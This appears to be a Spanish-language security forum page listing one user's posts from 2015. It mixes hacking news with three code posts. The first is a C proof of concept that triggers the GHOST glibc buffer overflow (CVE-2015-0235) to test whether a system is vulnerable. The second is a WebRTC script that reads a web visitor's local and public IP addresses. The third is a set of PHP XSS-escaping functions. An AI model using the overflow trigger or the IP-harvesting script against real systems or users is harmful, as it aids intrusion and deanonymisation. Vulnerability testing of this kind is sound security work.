Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - el-brujo

Páginas 1 ... 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 ... 559

#1561

Noticias / Re: Hackean Instagram y Twitter a Taylor Swift

28 Enero 2015, 11:12 AM

Lizard Squad strikes again!

Cause the hackers gonna hack, hack, hack, hack, hack...

51,4 Millones de seguidores tienen la tia esta en Twitter jaja

#1562

Android / Re: que hacer cuando extravio el smarphone podra recuperce por EMAI

27 Enero 2015, 19:38 PM

Qué hacer si te roban o pierdes el teléfono móvil
http://blog.elhacker.net/2014/03/que-hacer-si-te-roban-o-pierdes-el.html

#1563

GNU/Linux / GHOST: PoC

27 Enero 2015, 18:26 PM

GHOST: glibc: buffer overflow en gethostbyname CVE-2015-0235
http://blog.elhacker.net/2015/01/ghost-glibc-buffer-overflow-en-gethostbyname-cve-2015-0235.html

Código (c) [Seleccionar]

#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

#define CANARY "in_the_coal_mine"

struct {
  char buffer[1024];
  char canary[sizeof(CANARY)];
} temp = { "buffer", CANARY };

int main(void) {
  struct hostent resbuf;
  struct hostent *result;
  int herrno;
  int retval;

  /*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/
  size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;
  char name[sizeof(temp.buffer)];
  memset(name, '0', len);
  name[len] = '\0';

  retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);

  if (strcmp(temp.canary, CANARY) != 0) {
    puts("vulnerable");
    exit(EXIT_SUCCESS);
  }
  if (retval == ERANGE) {
    puts("not vulnerable");
    exit(EXIT_SUCCESS);
  }
  puts("should not happen");
  exit(EXIT_FAILURE);
}

Código [Seleccionar]

gcc GHOST.c -o GHOST

#1564

Noticias / Re: Facebook e Instagram caen durante una hora por un fallo interno

27 Enero 2015, 18:22 PM

¿Un fallo interno?

Primero era un fallo eléctrico, luego la intensa nevada de USA....

Lizard Squad tumba Facebook, Instagram y MySpace
http://blog.elhacker.net/2015/01/lizard-squad-tumba-facebook-instagram-y-myspace.html

#1565

Noticias / Re: Vodafone España bloquea el acceso a The Pirate Bay (actualizado)

27 Enero 2015, 18:20 PM

Vodafone retira el bloqueo a The Pirate Bay
http://bandaancha.eu/articulos/vodafone-retira-bloqueo-the-pirate-bay-9123

Citar"hemos investigado internamente y retiramos el bloqueo al no tener constancia de la orden

#1566

Desarrollo Web / Obtener la ip local y remota usando javascript

27 Enero 2015, 17:31 PM

Get local and public IP addresses in javascript (github.com)
https://github.com/diafygi/webrtc-ips

Usando WebRTC

Código (javascript) [Seleccionar]

//get the IP addresses associated with an account
function getIPs(callback){
    var ip_dups = {};

    //compatibility for firefox and chrome
    var RTCPeerConnection = window.RTCPeerConnection
        || window.mozRTCPeerConnection
        || window.webkitRTCPeerConnection;
    var mediaConstraints = {
        optional: [{RtpDataChannels: true}]
    };

    //firefox already has a default stun server in about:config
    //    media.peerconnection.default_iceservers =
    //    [{"url": "stun:stun.services.mozilla.com"}]
    var servers = undefined;

    //add same stun server for chrome
    if(window.webkitRTCPeerConnection)
        servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};

    //construct a new RTCPeerConnection
    var pc = new RTCPeerConnection(servers, mediaConstraints);

    //listen for candidate events
    pc.onicecandidate = function(ice){

        //skip non-candidate events
        if(ice.candidate){

            //match just the IP address
            var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
            var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];

            //remove duplicates
            if(ip_dups[ip_addr] === undefined)
                callback(ip_addr);

            ip_dups[ip_addr] = true;
        }
    };

    //create a bogus data channel
    pc.createDataChannel("");

    //create an offer sdp
    pc.createOffer(function(result){

        //trigger the stun server request
        pc.setLocalDescription(result, function(){});

    }, function(){});
}

//Test: Print the IP addresses into the console
getIPs(function(ip){console.log(ip);});

#1567

GNU/Linux / Re: Elección sobre servidor smtp, imap y administrador

27 Enero 2015, 12:09 PM

Añade en los registros SPF del domnio (DNS) las ip's de los servidores de correo para evitar que lleguen a la carpeta de Spam.

#1568

PHP / Re: Cual es el procedimiento mas efectivo para evitar XSS?

27 Enero 2015, 11:47 AM

Código (php) [Seleccionar]

//xss mitigation functions
function xssafe($data,$encoding='UTF-8')
{
   return htmlspecialchars($data,ENT_QUOTES | ENT_HTML401,$encoding);
}
function xecho($data)
{
   echo xssafe($data);
}

Código (php) [Seleccionar]

function SanitizeInputXSS($dirty_input) {
      return htmlspecialchars(rawurldecode(trim($dirty_input)), ENT_QUOTES,'UTF-8');
 }

$name = SanitizeInputXSS($_POST['name']);